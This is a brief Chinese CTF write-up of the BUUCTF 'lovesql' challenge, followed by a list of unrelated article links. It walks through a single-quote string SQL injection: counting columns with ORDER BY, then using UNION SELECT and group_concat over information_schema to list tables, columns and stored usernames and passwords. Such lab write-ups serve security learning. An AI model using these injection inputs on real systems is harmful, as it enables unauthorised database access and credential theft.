当前位置：首页 > article >正文

47，【5】BUUCTF web lovesql

article 2025/1/20 5:35:17

进入靶场

可知是单引号闭合，属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1，本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

查看全文

http://www.kler.cn/a/510264.html

ASP.NET Core中 JWT 实现无感刷新Token

【深度学习】Huber Loss详解

常见的两种虚拟化技术比较：KVM与VMware

javaEE初阶————多线程初阶(2)

AUTOSAR从入门到精通-无人驾驶网约车(Robotaxi)

IM聊天学习资源

联德胜w801开发板（四）实现腾讯云mqtt的订阅和发布

浅谈 JVM

Gitlab Runner安装与配置

mkv转码mp4（ffmpeg工具）

寒假1.18

VUE学习笔记(入门)4__安装开发者工具

ElasticSearch上

51.WPF应用加图标指南 C#例子 WPF例子

Node.js path.resolve

clang、C++23标准库模块基本使用

Vue如何构建项目

go采集注册表

imread和jpeg_read在MATLAB中处理图像时的不同

1.17组会汇报

windows-本地部署Git仓库-安装Gitea

LQ1043 双面打印

flask项目中使用schedule定时任务案例

第 7 课Python 容器类型与相关操作

UnityEditor脚本：调用ADB推送文件到手机

Spring参数校验，数组入参校验：List＜E＞

笔记

相关文章：